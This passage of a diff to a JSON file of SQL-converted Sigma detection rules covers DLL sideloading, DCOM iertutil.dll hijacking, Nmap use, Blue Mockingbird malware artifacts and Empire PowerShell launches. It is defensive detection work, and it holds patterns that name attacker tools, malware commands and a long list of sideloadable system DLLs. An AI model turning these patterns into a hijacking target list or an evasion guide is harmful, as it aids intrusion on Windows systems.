'%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + 
"filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload 
